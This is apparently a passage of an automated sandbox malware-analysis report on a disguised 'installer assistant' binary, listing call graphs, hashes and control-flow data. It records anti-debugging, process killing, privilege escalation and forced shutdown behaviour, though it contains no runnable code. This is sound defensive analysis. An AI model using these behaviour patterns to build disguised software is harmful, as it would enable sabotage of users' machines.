6c7b70c4 93982->93983 93988 6c921d4b 93982->93988 93983->93529 93985->93530 93986->93532 93987->93534 93989 6c921d76 93988->93989 93990 6c921d59 93988->93990 93989->93982 93990->93989 93991 6c921d66 93990->93991 93992 6c921d7a 93990->93992 94004 6c920690 18 API calls __cftoe 93991->94004 93996 6c921f72 93992->93996 93997 6c921f7e __wsopen_s 93996->93997 94005 6c91cb19 EnterCriticalSection 93997->94005 93999 6c921f8c 94006 6c921f2f 93999->94006 94003 6c921dac 94003->93982 94004->93989 94005->93999 94014 6c928b16 94006->94014 94012 6c921f69 94013 6c921fc1 LeaveCriticalSection 94012->94013 94013->94003 94015 6c92a1d0 18 API calls 94014->94015 94016 6c928b27 94015->94016 94017 6c931f55 __wsopen_s 18 API calls 94016->94017 94019 6c928b2d __wsopen_s 94017->94019 94018 6c921f43 94021 6c921dae 94018->94021 94019->94018 94031 6c924d2b HeapFree GetLastError __dosmaperr 94019->94031 94023 6c921dc0 94021->94023 94025 6c921dde 94021->94025 94022 6c921dce 94032 6c920690 18 API calls __cftoe 94022->94032 94023->94022 94023->94025 94028 6c921df6 _Yarn 94023->94028 94030 6c928bc9 62 API calls 94025->94030 94026 6c921229 62 API calls 94026->94028 94027 6c92a1d0 18 API calls 94027->94028 94028->94025 94028->94026 94028->94027 94029 6c92c0dc __wsopen_s 62 API calls 94028->94029 94029->94028 94030->94012 94031->94018 94032->94025 94033 6c7af150 94035 6c7aefbe 94033->94035 94034 6c7af243 CreateFileA 94038 6c7af2a7 94034->94038 94035->94034 94036 6c7b02ca 94037 6c7b02ac GetCurrentProcess TerminateProcess 94037->94036 94038->94036 94038->94037 94039 6c794b53 94040 6c916fb3 std::_Facet_Register 4 API calls 94039->94040 94041 6c794b5c _Yarn 94040->94041 94042 6c90b430 FindFirstFileA 94041->94042 94047 6c794bae std::ios_base::_Ios_base_dtor 94042->94047 94043 6c7b639e 94241 6c9206a0 18 API calls 2 library calls 94043->94241 94045 6c794cff 94046 6c795164 CreateFileA CloseHandle 94051 6c7951ec 94046->94051 94047->94043 94047->94045 94047->94046 94048 6c7a245a _Yarn _strlen 94047->94048 94048->94043 94050 6c90b430 FindFirstFileA 94048->94050 94065 6c7a2a83 std::ios_base::_Ios_base_dtor 94050->94065 94197 6c915690 OpenSCManagerA 94051->94197 94053 6c79fc00 94234 6c9157b0 CreateToolhelp32Snapshot 94053->94234 94056 6c916fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 94093 6c795478 std::ios_base::_Ios_base_dtor _Yarn _strlen 94056->94093 94058 6c7a37d0 Sleep 94103 6c7a37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 94058->94103 94059 6c90b430 FindFirstFileA 94059->94093 94060 6c7b63b2 94242 6c7915e0 18 API calls std::ios_base::_Ios_base_dtor 94060->94242 94061 6c9157b0 4 API calls 94078 6c7a053a 94061->94078 94062 6c9157b0 4 API calls 94088 6c7a12e2 94062->94088 94064 6c7b64f8 94065->94043 94201 6c900900 94065->94201 94066 6c79ffe3 94066->94061 94072 6c7a0abc 94066->94072 94067 6c7b6ba0 104 API calls 94067->94093 94068 6c7b6e60 32 API calls 94068->94093 94070 6c7b7090 77 API calls 94070->94093 94071 6c9157b0 4 API calls 94071->94072 94072->94048 94072->94062 94073 6c9157b0 4 API calls 94092 6c7a1dd9 94073->94092 94074 6c7a211c 94074->94048 94076 6c7a241a 94074->94076 94075 6c7de010 67 API calls 94075->94093 94079 6c900900 11 API calls 94076->94079 94077 6c90b430 FindFirstFileA 94077->94103 94078->94071 94078->94072 94081 6c7a244d 94079->94081 94080 6c796722 94210 6c911df0 25 API calls 4 library calls 94080->94210 94240 6c9162d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 94081->94240 94083 6c7a2452 Sleep 94083->94048 94084 6c7a16ac 94085 6c796162 94087 6c79740b 94211 6c915560 CreateProcessA 94087->94211 94088->94073 94088->94074 94088->94084 94089 6c9157b0 4 API calls 94089->94074 94090 6c7b6ba0 104 API calls 94090->94103 94091 6c7b6e60 32 API calls 94091->94103 94092->94074 94092->94089 94093->94043 94093->94053 94093->94056 94093->94059 94093->94067 94093->94068 94093->94070 94093->94075 94093->94080 94093->94085 94094 6c7b7090 77 API calls 94094->94103 94095 6c7de010 67 API calls 94095->94103 94096 6c79775a _strlen 94096->94043 94097 6c797ba9 94096->94097 94098 6c797b92 94096->94098 94101 6c797b43 _Yarn 94096->94101 94100 6c916fb3 std::_Facet_Register 4 API calls 94097->94100 94099 6c916fb3 std::_Facet_Register 4 API calls 94098->94099 94099->94101 94100->94101 94102 6c90b430 FindFirstFileA 94101->94102 94111 6c797be7 std::ios_base::_Ios_base_dtor 94102->94111 94103->94043 94103->94077 94103->94090 94103->94091 94103->94094 94103->94095 94104 6c915560 4 API calls 94115 6c798a07 94104->94115 94105 6c799d68 94107 6c916fb3 std::_Facet_Register 4 API calls 94105->94107 94106 6c799d7f 94108 6c916fb3 std::_Facet_Register 4 API calls 94106->94108 94109 6c799d18 _Yarn 94107->94109 94108->94109 94110 6c90b430 FindFirstFileA 94109->94110 94119 6c799dbd std::ios_base::_Ios_base_dtor 94110->94119 94111->94043 94111->94104 94112 6c79962c _strlen 94111->94112 94113 6c798387 94111->94113 94112->94043 94112->94105 94112->94106 94112->94109 94114 6c915560 4 API calls 94123 6c799120 94114->94123 94115->94114 94116 6c915560 4 API calls 94133 6c79a215 _strlen 94116->94133 94117 6c915560 4 API calls 94118 6c799624 94117->94118 94215 6c9162d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 94118->94215 94119->94043 94119->94116 94124 6c79e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 94119->94124 94120 6c916fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 94120->94124 94122 6c90b430 FindFirstFileA 94122->94124 94123->94117 94124->94043 94124->94120 94124->94122 94125 6c79f7b1 94124->94125 94126 6c79ed02 Sleep 94124->94126 94233 6c9162d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 94125->94233 94145 6c79e8c1 94126->94145 94128 6c79a9bb 94132 6c916fb3 std::_Facet_Register 4 API calls 94128->94132 94129 6c79a9a4 94131 6c916fb3 std::_Facet_Register 4 API calls 94129->94131 94130 6c79e8dd GetCurrentProcess TerminateProcess 94130->94124 94140 6c79a953 _Yarn _strlen 94131->94140 94132->94140 94133->94043 94133->94128 94133->94129 94133->94140 94134 6c915560 4 API calls 94134->94145 94135 6c79fbb8 94136 6c79fbe8 ExitWindowsEx Sleep 94135->94136 94136->94053 94137 6c79f7c0 94137->94135 94138 6c79b009 94142 6c916fb3 std::_Facet_Register 4 API calls 94138->94142 94139 6c79aff0 94141 6c916fb3 std::_Facet_Register 4 API calls 94139->94141 94140->94060 94140->94138 94140->94139 94143 6c79afa0 _Yarn 94140->94143 94141->94143 94142->94143 94216 6c915ed0 94143->94216 94145->94124 94145->94130 94145->94134 94146 6c79b059 std::ios_base::_Ios_base_dtor _strlen 94146->94043 94147 6c79b42c 94146->94147 94148 6c79b443 94146->94148 94151 6c79b3da _Yarn _strlen 94146->94151 94149 6c916fb3 std::_Facet_Register 4 API calls 94147->94149 94150 6c916fb3 std::_Facet_Register 4 API calls 94148->94150 94149->94151 94150->94151 94151->94060 94152 6c79b79e 94151->94152 94153 6c79b7b7 94151->94153 94156 6c79b751 _Yarn 94151->94156 94154 6c916fb3 std::_Facet_Register 4 API calls 94152->94154 94155 6c916fb3 std::_Facet_Register 4 API calls 94153->94155 94154->94156 94155->94156 94157 6c915ed0 104 API calls 94156->94157 94158 6c79b804 std::ios_base::_Ios_base_dtor _strlen 94157->94158 94158->94043 94159 6c79bc0f 94158->94159 94160 6c79bc26 94158->94160 94163 6c79bbbd _Yarn _strlen 94158->94163 94161 6c916fb3 std::_Facet_Register 4 API calls 94159->94161 94162 6c916fb3 std::_Facet_Register 4 API calls 94160->94162 94161->94163 94162->94163 94163->94060 94164 6c79c08e 94163->94164 94165 6c79c075 94163->94165 94168 6c79c028 _Yarn 94163->94168 94167 6c916fb3 std::_Facet_Register 4 API calls 94164->94167 94166 6c916fb3 std::_Facet_Register 4 API calls 94165->94166 94166->94168 94167->94168 94169 6c915ed0 104 API calls 94168->94169 94174 6c79c0db std::ios_base::_Ios_base_dtor _strlen 94169->94174 94170 6c79c7bc 94173 6c916fb3 std::_Facet_Register 4 API calls 94170->94173 94171 6c79c7a5 94172 6c916fb3 std::_Facet_Register 4 API calls 94171->94172 94181 6c79c753 _Yarn _strlen 94172->94181 94173->94181 94174->94043 94174->94170 94174->94171 94174->94181 94175 6c79d3ed 94177 6c916fb3 std::_Facet_Register 4 API calls 94175->94177 94176 6c79d406 94178 6c916fb3 std::_Facet_Register 4 API calls 94176->94178 94179 6c79d39a _Yarn 94177->94179 94178->94179 94180 6c915ed0 104 API calls 94179->94180 94182 6c79d458 std::ios_base::_Ios_base_dtor _strlen 94180->94182 94181->94060 94181->94175 94181->94176 94181->94179 94187 6c79cb2f 94181->94187 94182->94043 94183 6c79d8bb 94182->94183 94184 6c79d8a4 94182->94184 94188 6c79d852 _Yarn _strlen 94182->94188 94186 6c916fb3 std::_Facet_Register 4 API calls 94183->94186 94185 6c916fb3 std::_Facet_Register 4 API calls 94184->94185 94185->94188 94186->94188 94188->94060 94189 6c79dccf 94188->94189 94190 6c79dcb6 94188->94190 94193 6c79dc69 _Yarn 94188->94193 94192 6c916fb3 std::_Facet_Register 4 API calls 94189->94192 94191 6c916fb3 std::_Facet_Register 4 API calls 94190->94191 94191->94193 94192->94193 94194 6c915ed0 104 API calls 94193->94194 94196 6c79dd1c std::ios_base::_Ios_base_dtor 94194->94196 94195 6c915560 4 API calls 94195->94124 94196->94043 94196->94195 94199 6c9156c6 94197->94199 94198 6c915758 OpenServiceA 94198->94199 94199->94198 94200 6c91579f 94199->94200 94200->94093 94206 6c900913 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 94201->94206 94202 6c9044cf CloseHandle 94202->94206 94203 6c90367e CloseHandle 94203->94206 94204 6c7a37cb 94209 6c9162d0 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 94204->94209 94205 6c902a8b CloseHandle 94205->94206 94206->94202 94206->94203 94206->94204 94206->94205 94208 6c8ec750 WriteFile WriteFile WriteFile ReadFile 94206->94208 94243 6c8ebca0 94206->94243 94208->94206 94209->94058 94210->94087 94212 6c91563a 94211->94212 94213 6c9155f0 WaitForSingleObject CloseHandle CloseHandle 94212->94213 94214 6c915653 94212->94214 94213->94212 94214->94096 94215->94112 94217 6c915f27 94216->94217 94254 6c916560 94217->94254 94219 6c915f38 94220 6c7b6ba0 104 API calls 94219->94220 94227 6c915f5c 94220->94227 94221 6c915fd7 94222 6c7de010 67 API calls 94221->94222 94223 6c91600f std::ios_base::_Ios_base_dtor 94222->94223 94225 6c7de010 67 API calls 94223->94225 94228 6c916052 std::ios_base::_Ios_base_dtor 94225->94228 94226 6c915fc4 94291 6c916100 94226->94291 94227->94221 94227->94226 94273 6c9168b0 94227->94273 94281 6c7f2370 94227->94281 94228->94146 94231 6c915fcc 94232 6c7b7090 77 API calls 94231->94232 94232->94221 94233->94137 94235 6c915810 std::locale::_Setgloballocale 94234->94235 94236 6c915890 Process32NextW 94235->94236 94237 6c9157e7 CloseHandle 94235->94237 94238 6c915921 94235->94238 94239 6c9158b5 Process32FirstW 94235->94239 94236->94235 94237->94235 94238->94066 94239->94235 94240->94083 94242->94064 94244 6c8ebcb3 _Yarn __wsopen_s std::locale::_Setgloballocale 94243->94244 94245 6c8ec6f0 94244->94245 94246 6c8ec25d CreateFileA 94244->94246 94248 6c8eafa0 94244->94248 94245->94206 94246->94244 94249 6c8eafb3 __wsopen_s std::locale::_Setgloballocale 94248->94249 94250 6c8eb959 WriteFile 94249->94250 94251 6c8eb9ad WriteFile 94249->94251 94252 6c8ebc88 94249->94252 94253 6c8eb105 ReadFile 94249->94253 94250->94249 94251->94249 94252->94244 94253->94249 94255 6c916595 94254->94255 94256 6c7e2020 52 API calls 94255->94256 94257 6c916636 94256->94257 94258 6c916fb3 std::_Facet_Register 4 API calls 94257->94258 94259 6c91666e 94258->94259 94260 6c917897 43 API calls 94259->94260 94261 6c916682 94260->94261 94262 6c7e1d90 89 API calls 94261->94262 94263 6c91672b 94262->94263 94264 6c91675c 94263->94264 94306 6c7e2250 30 API calls 94263->94306 94264->94219 94266 6c916796 94307 6c7e26e0 24 API calls 4 library calls 94266->94307 94268 6c9167a8 94308 6c9198e9 RaiseException 94268->94308 94270 6c9167bd 94271 6c7de010 67 API calls 94270->94271 94272 6c9167cf 94271->94272 94272->94219 94274 6c9168fd 94273->94274 94309 6c916b10 94274->94309 94276 6c9169ec 94276->94227 94279 6c916915 94279->94276 94327 6c7e2250 30 API calls 94279->94327 94328 6c7e26e0 24 API calls 4 library calls 94279->94328 94329 6c9198e9 RaiseException 94279->94329 94282 6c7f23af 94281->94282 94285 6c7f23c3 94282->94285 94338 6c7e3560 32 API calls std::_Xinvalid_argument 94282->94338 94287 6c7f247e 94285->94287 94340 6c7e2250 30 API calls 94285->94340 94341 6c7e26e0 24 API calls 4 library calls 94285->94341 94342 6c9198e9 RaiseException 94285->94342 94290 6c7f2491 94287->94290 94339 6c7e37e0 32 API calls std::_Xinvalid_argument 94287->94339 94290->94227 94292 6c91610e 94291->94292 94295 6c916141 94291->94295 94293 6c7e01f0 64 API calls 94292->94293 94296 6c916134 94293->94296 94294 6c9161f3 94294->94231 94295->94294 94343 6c7e2250 30 API calls 94295->94343 94297 6c921088 67 API calls 94296->94297 94297->94295 94299 6c91621e 94344 6c7e2340 24 API calls 94299->94344 94301 6c91622e 94345 6c9198e9 RaiseException 94301->94345 94303 6c916239 94304 6c7de010 67 API calls 94303->94304 94305 6c916292 std::ios_base::_Ios_base_dtor 94304->94305 94305->94231 94306->94266 94307->94268 94308->94270 94310 6c916b78 94309->94310 94311 6c916b4c 94309->94311 94317 6c916b89 94310->94317 94330 6c7e3560 32 API calls std::_Xinvalid_argument 94310->94330 94312 6c916b71 94311->94312 94332 6c7e2250 30 API calls 94311->94332 94312->94279 94315 6c916d58 94333 6c7e2340 24 API calls 94315->94333 94317->94312 94331 6c7e2f60 42 API calls 4 library calls 94317->94331 94318 6c916d67 94334 6c9198e9 RaiseException 94318->94334 94321 6c916bc3 94321->94312 94335 6c7e2250 30 API calls 94321->94335 94323 6c916d97 94336 6c7e2340 24 API calls 94323->94336 94325 6c916dad 94337 6c9198e9 RaiseException 94325->94337 94327->94279 94328->94279 94329->94279 94330->94317 94331->94321 94332->94315 94333->94318 94334->94321 94335->94323 94336->94325 94337->94312 94338->94285 94339->94290 94340->94285 94341->94285 94342->94285 94343->94299 94344->94301 94345->94303 94346 6c793d62 94348 6c793bc0 94346->94348 94347 6c793e8a GetCurrentThread NtSetInformationThread 94349 6c793eea 94347->94349 94348->94347 94350 6c7a4a27 94352 6c7a4a5d _strlen 94350->94352 94351 6c7b639e 94441 6c9206a0 18 API calls 2 library calls 94351->94441 94352->94351 94353 6c7a5b58 94352->94353 94354 6c7a5b6f 94352->94354 94358 6c7a5b09 _Yarn 94352->94358 94355 6c916fb3 std::_Facet_Register 4 API calls 94353->94355 94356 6c916fb3 std::_Facet_Register 4 API calls 94354->94356 94355->94358 94356->94358 94359 6c90b430 FindFirstFileA 94358->94359 94361 6c7a5bad std::ios_base::_Ios_base_dtor 94359->94361 94360 6c915560 4 API calls 94370 6c7a61cb _strlen 94360->94370 94361->94351 94361->94360 94364 6c7a9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 94361->94364 94362 6c916fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 94362->94364 94363 6c90b430 FindFirstFileA 94363->94364 94364->94351 94364->94362 94364->94363 94365 6c7aa292 Sleep 94364->94365 94385 6c7ae619 94364->94385 94382 6c7a9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 94365->94382 94366 6c7a660d 94368 6c916fb3 std::_Facet_Register 4 API calls 94366->94368 94367 6c7a6624 94369 6c916fb3 std::_Facet_Register 4 API calls 94367->94369 94377 6c7a65bc _Yarn _strlen 94368->94377 94369->94377 94370->94351 94370->94366 94370->94367 94370->94377 94371 6c7a9bbd GetCurrentProcess TerminateProcess 94371->94364 94372 6c7b63b2 94442 6c7915e0 18 API calls std::ios_base::_Ios_base_dtor 94372->94442 94374 6c7b64f8 94375 6c7a6989 94379 6c916fb3 std::_Facet_Register 4 API calls 94375->94379 94376 6c7a6970 94378 6c916fb3 std::_Facet_Register 4 API calls 94376->94378 94377->94372 94377->94375 94377->94376 94380 6c7a6920 _Yarn 94377->94380 94378->94380 94379->94380 94381 6c915ed0 104 API calls 94380->94381 94386 6c7a69d6 std::ios_base::_Ios_base_dtor _strlen 94381->94386 94382->94351 94382->94364 94382->94371 94382->94372 94391 6c915ed0 104 API calls 94382->94391 94437 6c916fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 94382->94437 94440 6c915560 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 94382->94440 94383 6c7af243 CreateFileA 94394 6c7af2a7 94383->94394 94384 6c7b02ca 94385->94383 94386->94351 94387 6c7a6dbb 94386->94387 94388 6c7a6dd2 94386->94388 94397 6c7a6d69 _Yarn _strlen 94386->94397 94389 6c916fb3 std::_Facet_Register 4 API calls 94387->94389 94390 6c916fb3 std::_Facet_Register 4 API calls 94388->94390 94389->94397 94390->94397 94391->94382 94392 6c7a7440 94396 6c916fb3 std::_Facet_Register 4 API calls 94392->94396 94393 6c7a7427 94395 6c916fb3 std::_Facet_Register 4 API calls 94393->94395 94394->94384 94400 6c7b02ac GetCurrentProcess TerminateProcess 94394->94400 94398 6c7a73da _Yarn 94395->94398 94396->94398 94397->94372 94397->94392 94397->94393 94397->94398 94399 6c915ed0 104 API calls 94398->94399 94401 6c7a748d std::ios_base::_Ios_base_dtor _strlen 94399->94401 94400->94384 94401->94351 94402 6c7a79a8 94401->94402 94403 6c7a7991 94401->94403 94410 6c7a7940 _Yarn _strlen 94401->94410 94405 6c916fb3 std::_Facet_Register 4 API calls 94402->94405 94404 6c916fb3 std::_Facet_Register 4 API calls 94403->94404 94404->94410 94405->94410 94406 6c7a7dc9 94408 6c916fb3 std::_Facet_Register 4 API calls 94406->94408 94407 6c7a7de2 94409 6c916fb3 std::_Facet_Register 4 API calls 94407->94409 94411 6c7a7d7c _Yarn 94408->94411 94409->94411 94410->94372 94410->94406 94410->94407 94410->94411 94412 6c915ed0 104 API calls 94411->94412 94413 6c7a7e2f std::ios_base::_Ios_base_dtor _strlen 94412->94413 94413->94351 94414 6c7a85a8 94413->94414 94415 6c7a85bf 94413->94415 94423 6c7a8556 _Yarn _strlen 94413->94423 94416 6c916fb3 std::_Facet_Register 4 API calls 94414->94416 94417 6c916fb3 std::_Facet_Register 4 API calls 94415->94417 94416->94423 94417->94423 94418 6c7a896a 94420 6c916fb3 std::_Facet_Register 4 API calls 94418->94420 94419 6c7a8983 94421 6c916fb3 std::_Facet_Register 4 API calls 94419->94421 94422 6c7a891d _Yarn 94420->94422 94421->94422 94424 6c915ed0 104 API calls 94422->94424 94423->94372 94423->94418 94423->94419 94423->94422 94425 6c7a89d0 std::ios_base::_Ios_base_dtor _strlen 94424->94425 94425->94351 94426 6c7a8f1f 94425->94426 94427 6c7a8f36 94425->94427 94430 6c7a8ecd _Yarn _strlen 94425->94430 94428 6c916fb3 std::_Facet_Register 4 API calls 94426->94428 94429 6c916fb3 std::_Facet_Register 4 API calls 94427->94429 94428->94430 94429->94430 94430->94372 94431 6c7a936d 94430->94431 94432 6c7a9354 94430->94432 94435 6c7a9307 _Yarn 94430->94435 94434 6c916fb3 std::_Facet_Register 4 API calls 94431->94434 94433 6c916fb3 std::_Facet_Register 4 API calls 94432->94433 94433->94435 94434->94435 94436 6c915ed0 104 API calls 94435->94436 94439 6c7a93ba std::ios_base::_Ios_base_dtor 94436->94439 94437->94382 94438 6c915560 4 API calls 94438->94364 94439->94351 94439->94438 94440->94382 94442->94374 94443 6c91f4af 94444 6c91f4bb __wsopen_s 94443->94444 94445 6c91f4c2 GetLastError ExitThread 94444->94445 94446 6c91f4cf 94444->94446 94447 6c924f22 __Getctype 37 API calls 94446->94447 94448 6c91f4d4 94447->94448 94455 6c92a2d6 94448->94455 94452 6c91f4eb 94461 6c91f41a 16 API calls 2 library calls 94452->94461 94454 6c91f50d 94456 6c92a2e8 GetPEB 94455->94456 94458 6c91f4df 94455->94458 94457 6c92a2fb 94456->94457 94456->94458 94462 6c927388 5 API calls std::_Lockit::_Lockit 94457->94462 94458->94452 94460 6c9272df 5 API calls std::_Lockit::_Lockit 94458->94460 94460->94452 94461->94454 94462->94458

                              Executed Functions

                              Function 6C794754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 50568539d288e4e284b55d20e075d3551ad31bc7f9459f0818c25dcf33fb235d
                              • Instruction ID: 0c86a7a443c9626eb8d002194fa21df653e628cc25f46bb0f660ac28c2ab2f37
                              • Opcode Fuzzy Hash: 50568539d288e4e284b55d20e075d3551ad31bc7f9459f0818c25dcf33fb235d
                              • Instruction Fuzzy Hash: 7574F471644B018FC728CF28C9D0A95B7F3FF95318B198B6DC0AA8BA55E774B54ACB40
                              Function 6C7A4A27 Relevance: 61.3, APIs: 25, Strings: 3, Instructions: 12265COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: 2f461a43ea50fb4e366f32944c68fc3800b3923372ad133bbd27f26f19e20dbd
                              • Instruction ID: 8e05774fdc1d61e7e1526b388d637fd29221061d10061466f9699507d4fd7a48
                              • Opcode Fuzzy Hash: 2f461a43ea50fb4e366f32944c68fc3800b3923372ad133bbd27f26f19e20dbd
                              • Instruction Fuzzy Hash: 04342771644B018FC728CF68C9D0A96B7E3EF95318B198B6DC0A64BB55EB34B54BCB40
                              Function 6C9157B0 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7677 6c9157b0-6c9157e5 CreateToolhelp32Snapshot 7678 6c915810-6c915819 7677->7678 7679 6c915850-6c915855 7678->7679 7680 6c91581b-6c915820 7678->7680 7683 6c9158e7-6c915911 call 6c923175 7679->7683 7684 6c91585b-6c915860 7679->7684 7681 6c915822-6c915827 7680->7681 7682 6c915885-6c91588a 7680->7682 7688 6c9158a4-6c9158cd call 6c91be90 Process32FirstW 7681->7688 7689 6c915829-6c91582e 7681->7689 7685 6c915890-6c9158a2 Process32NextW 7682->7685 7686 6c915916-6c91591b 7682->7686 7683->7678 7690 6c915862-6c915867 7684->7690 7691 6c9157e7-6c915802 CloseHandle 7684->7691 7692 6c9158d2-6c9158e2 7685->7692 7686->7678 7695 6c915921-6c91592f 7686->7695 7688->7692 7689->7678 7696 6c915830-6c915841 7689->7696 7690->7678 7697 6c915869-6c915883 7690->7697 7691->7678 7692->7678 7696->7678 7697->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C9157BE
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1597706638.000000006C791000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C790000, based on PE: true
                              • Associated: 0000000B.00000002.1597624216.000000006C790000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599050249.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1600616681.000000006CB03000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: e0d4a6d5b9ebca8f6b90ff349d3223dfd23a6d64904769e9ee5586ad3c04433b
                              • Instruction ID: 8474e393df009516b6f48d6d31aedd2e046fb4b63b4a03f840aecbdb75c6c14c
                              • Opcode Fuzzy Hash: e0d4a6d5b9ebca8f6b90ff349d3223dfd23a6d64904769e9ee5586ad3c04433b
                              • Instruction Fuzzy Hash: 26317C74608304DFD7109F28C886B0ABBF8AF95718F5189AAE489C7B60D331D8498B52
                              Function 6C793886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7821 6c793886-6c79388e 7822 6c793970-6c79397d 7821->7822 7823 6c793894-6c793896 7821->7823 7825 6c79397f-6c793989 7822->7825 7826 6c7939f1-6c7939f8 7822->7826 7823->7822 7824 6c79389c-6c7938b9 7823->7824 7827 6c7938c0-6c7938c1 7824->7827 7825->7824 7828 6c79398f-6c793994 7825->7828 7829 6c7939fe-6c793a03 7826->7829 7830 6c793ab5-6c793aba 7826->7830 7833 6c79395e 7827->7833 7835 6c79399a-6c79399f 7828->7835 7836 6c793b16-6c793b18 7828->7836 7831 6c793a09-6c793a2f 7829->7831 7832 6c7938d2-6c7938d4 7829->7832 7830->7824 7834 6c793ac0-6c793ac7 7830->7834 7837 6c7938f8-6c793955 7831->7837 7838 6c793a35-6c793a3a 7831->7838 7839 6c793957-6c79395c 7832->7839 7840 6c793960-6c793964 7833->7840 7834->7827 7841 6c793acd-6c793ad6 7834->7841 7842 6c79383b-6c793855 call 6c8e19e0 call 6c8e19f0 7835->7842 7843 6c7939a5-6c7939bf 7835->7843 7836->7827 7837->7839 7844 6c793b1d-6c793b22 7838->7844 7845 6c793a40-6c793a57 7838->7845 7839->7833 7847 6c79396a 7840->7847 7848 6c793860-6c793885 7840->7848 7841->7836 7849 6c793ad8-6c793aeb 7841->7849 7842->7848 7850 6c793a5a-6c793a5d 7843->7850 7856 6c793b49-6c793b50 7844->7856 7857 6c793b24-6c793b44 7844->7857 7845->7850 7853 6c793ba1-6c793bb6 7847->7853 7848->7821 7849->7837 7854 6c793af1-6c793af8 7849->7854 7851 6c793aa9-6c793ab0 7850->7851 7851->7840 7859 6c793bc0-6c793bda call 6c8e19e0 call 6c8e19f0 7853->7859 7861 6c793afa-6c793aff 7854->7861 7862 6c793b62-6c793b85 7854->7862 7856->7827 7858 6c793b56-6c793b5d 7856->7858 7857->7851 7858->7840 7872 6c793be0-6c793bfe 7859->7872 7861->7839 7862->7837 7865 6c793b8b 7862->7865 7865->7853 7875 6c793e7b 7872->7875 7876 6c793c04-6c793c11 7872->7876 7877 6c793e81-6c793ee0 call 6c793750 GetCurrentThread NtSetInformationThread 7875->7877 7878 6c793ce0-6c793cea 7876->7878 7879 6c793c17-6c793c20 7876->7879 7894 6c793eea-6c793f04 call 6c8e19e0 call 6c8e19f0 7877->7894 7881 6c793d3a-6c793d3c 7878->7881 7882 6c793cec-6c793d0c 7878->7882 7883 6c793dc5 7879->7883 7884 6c793c26-6c793c2d 7879->7884 7889 6c793d3e-6c793d45 7881->7889 